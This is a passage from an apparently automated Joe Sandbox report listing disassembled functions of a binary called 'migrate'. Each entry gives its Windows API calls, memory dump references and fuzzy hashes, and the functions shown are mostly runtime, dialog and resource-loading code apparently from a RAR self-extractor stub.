                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001214E6
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00121500
                                                                                                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00121513
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00121523
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00121533
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2092733347-0
                                                                                                                                                                                                    • Opcode ID: 53298238644c20a1afaf17d6a7dc5bd3a0de0f512868c16103da77ef89f3f22e
                                                                                                                                                                                                    • Instruction ID: 224e355914760b2b422d7162825fe7fb307a57d99216e495db8b64a9a6c9046b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53298238644c20a1afaf17d6a7dc5bd3a0de0f512868c16103da77ef89f3f22e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B31E879208355AFC704DFA8D88499BB7F8BF98714F004A1EF999C3610E730D559CBA6
                                                                                                                                                                                                    Function 00132AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00132AF1,001302FC,0012FA34), ref: 00132B08
                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00132B16
                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00132B2F
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00132AF1,001302FC,0012FA34), ref: 00132B81
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                    • Opcode ID: 48eb1227fa1f34925839a0ed84c703738d955adba05b4ce269b6e1ba0b6e3bc2
                                                                                                                                                                                                    • Instruction ID: a53836ca7c039e7e514eb52d6ce0a1ec15a6a783f1d526baa7cf34c69c9923e0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48eb1227fa1f34925839a0ed84c703738d955adba05b4ce269b6e1ba0b6e3bc2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE01D4371083116EEA243BB47C85926AB99EF227B6F60073AF520554F4EF624C419288
                                                                                                                                                                                                    Function 001397E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00151098,00134674,00151098,?,?,001340EF,?,?,00151098), ref: 001397E9
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013981C
                                                                                                                                                                                                    • _free.LIBCMT ref: 00139844
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00151098), ref: 00139851
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00151098), ref: 0013985D
                                                                                                                                                                                                    • _abort.LIBCMT ref: 00139863
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                    • Opcode ID: a885b556d03dd2adea74e8b318a9789e512cb15d1628b89481a3572f9e4eb281
                                                                                                                                                                                                    • Instruction ID: 95225f2beed8547f7334a208756a1a5c38a256251cbd71cfffb7314d0e7c552c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a885b556d03dd2adea74e8b318a9789e512cb15d1628b89481a3572f9e4eb281
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F0C839144605A6C71233747C4AA1B2A759FE3B71F350174F628925A2FFA0C8464565
                                                                                                                                                                                                    Function 0012DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0012DC47
                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012DC61
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012DC72
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0012DC7C
                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0012DC86
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0012DC91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2148572870-0
                                                                                                                                                                                                    • Opcode ID: d1735c635713453c4a52126b04bd0ea7d6db2af41f7dff61fd3662c182c51814
                                                                                                                                                                                                    • Instruction ID: b36778cf119abed2f29430876edcbcca0137a757ac452682844251fbb486587b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1735c635713453c4a52126b04bd0ea7d6db2af41f7dff61fd3662c182c51814
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4F03772A01229BBCB206BA5EC4DDDF7F7DEF427A1B004121B51AE2060D67486D6CBA0
                                                                                                                                                                                                    Function 0011C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 001205DA: _wcslen.LIBCMT ref: 001205E0
                                                                                                                                                                                                      • Part of subcall function 0011B92D: _wcsrchr.LIBVCRUNTIME ref: 0011B944
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0011C197
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0011C1DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                                                                                                    • Opcode ID: d961bc82287e74df55fa17d5033a09f60c54cdfceae1ea014c09827ad09964a8
                                                                                                                                                                                                    • Instruction ID: d4d1dbfea339cc6c70aa90000b7b86a7254c7f60eea28a5055119e27c0729581
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d961bc82287e74df55fa17d5033a09f60c54cdfceae1ea014c09827ad09964a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A54128255C0361E6C73EAF349842AFAB3B4EF54754F10492EF9916B192E7604DD1C3D2
                                                                                                                                                                                                    Function 0012CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0012CE9D
                                                                                                                                                                                                      • Part of subcall function 0011B690: _wcslen.LIBCMT ref: 0011B696
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012CED1
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,0015946A), ref: 0012CEF1
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0012CFFE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: %s%s%u
                                                                                                                                                                                                    • API String ID: 110358324-1360425832
                                                                                                                                                                                                    • Opcode ID: ff6d2d22cdad6a7e183a7192d89316a2c05b14629a81831b18c7cfd9cc01fb10
                                                                                                                                                                                                    • Instruction ID: 62400712121f1200f33bbe5c74e01f69bf59a7f149894f35d213b0308032aad0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff6d2d22cdad6a7e183a7192d89316a2c05b14629a81831b18c7cfd9cc01fb10
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 204168B1900268EADF25DB50EC45EEE77BCEB15341F4080A6FA09E7051EF709A94CFA1
                                                                                                                                                                                                    Function 0011BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0011BB27
                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0011A275,?,?,00000800,?,0011A23A,?,0011755C), ref: 0011BBC5
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0011BC3B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                                                                                                    • String ID: UNC$\\?\
                                                                                                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                                                                                                    • Opcode ID: ec1239689fca563e02b00c3cd8ff0d2d75d34f1f4ae403985b49bbace49925a3
                                                                                                                                                                                                    • Instruction ID: 870663682e3f85d16208c71f0df0cfe55beedfc9799a50bbd25876ffd44ea341
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec1239689fca563e02b00c3cd8ff0d2d75d34f1f4ae403985b49bbace49925a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E41A231448215BACF25AF60DC81FEB77B9AF55394F104579F864A3152EB70DEE0CAA0
                                                                                                                                                                                                    Function 0012B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0012B6ED
                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0012B712
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0012B744
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0012B767
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0012B73D,00000066), ref: 0012A6D5
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A6EC
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: LoadResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A703
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: LockResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A712
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0012B73D,00000066), ref: 0012A72D
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: GlobalLock.KERNEL32(00000000), ref: 0012A73E
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0012A762
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0012A7A7
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0012A7C6
                                                                                                                                                                                                      • Part of subcall function 0012A6C2: GlobalFree.KERNEL32(00000000), ref: 0012A7CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                                                    • String ID: ]
                                                                                                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                                                                                                    • Opcode ID: 02350e546d43a41727b614c4675184590f64f1a7c063bc59e3b0898d56b81b37
                                                                                                                                                                                                    • Instruction ID: 8a98ad95df63c0eecbfc9869e838f8a0be8f66e7eb912b76c78703cef74cb1ee
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02350e546d43a41727b614c4675184590f64f1a7c063bc59e3b0898d56b81b37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A01D236940231A7C7127774AC49EBF7BBAAFC0B52F190010F910A72D1DF318D6952B1
                                                                                                                                                                                                    Function 0012D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                      • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0012D64B
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0012D661
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0012D675
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0012D684
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                                                                    • String ID: RENAMEDLG
                                                                                                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                                                                                                    • Opcode ID: a53a8a813262ff3b0c73da0bef4b021a9856e1453260b85aa4dd7385aee0372a
                                                                                                                                                                                                    • Instruction ID: cd2307495dddd6667fddd5347b9ae604bec1fd6a07ce1f36567f5cb217b87721
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a53a8a813262ff3b0c73da0bef4b021a9856e1453260b85aa4dd7385aee0372a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF014C33244324BBD2204F64FD09F57776DFB5AB01F010014F345A24D0C7A29995E775
                                                                                                                                                                                                    Function 00137E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00137E24,?,?,00137DC4,?,0014C300,0000000C,00137F1B,?,00000002), ref: 00137E93
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00137EA6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00137E24,?,?,00137DC4,?,0014C300,0000000C,00137F1B,?,00000002,00000000), ref: 00137EC9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                    • Opcode ID: b5e871086757a4a336bf4654a463df70c2694d87d6500387ae4c80f2e6f1e7b2
                                                                                                                                                                                                    • Instruction ID: 8c4e88a475eede2c9b074eade28de91f0b033285a7d2a1b99f377680a208f372
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5e871086757a4a336bf4654a463df70c2694d87d6500387ae4c80f2e6f1e7b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18F06875904218FBCF119FA0DC09B9EBFB4EF45715F0441A9F815A31B0DB709E85CA90
                                                                                                                                                                                                    Function 00132BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2252061734-0
                                                                                                                                                                                                    • Opcode ID: 1163a8c37ba2216140e9719fd6d5223efb2dd6a536055771dacb965620c08e3e
                                                                                                                                                                                                    • Instruction ID: 35ad2eb4554da853982b38f12cc369e7cf4c38be2f4f2473dd84bc97b8c651c9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1163a8c37ba2216140e9719fd6d5223efb2dd6a536055771dacb965620c08e3e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89510472600212AFDB29AF94D845BBAB7B4FF64710F34452DEC06876A1E772ED80D790
                                                                                                                                                                                                    Function 0013BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0013BF39
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013BF5C
                                                                                                                                                                                                      • Part of subcall function 00138E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0013BF82
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013BF95
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0013BFA4
                                                                                                                                                                                                    Memory Dump Source
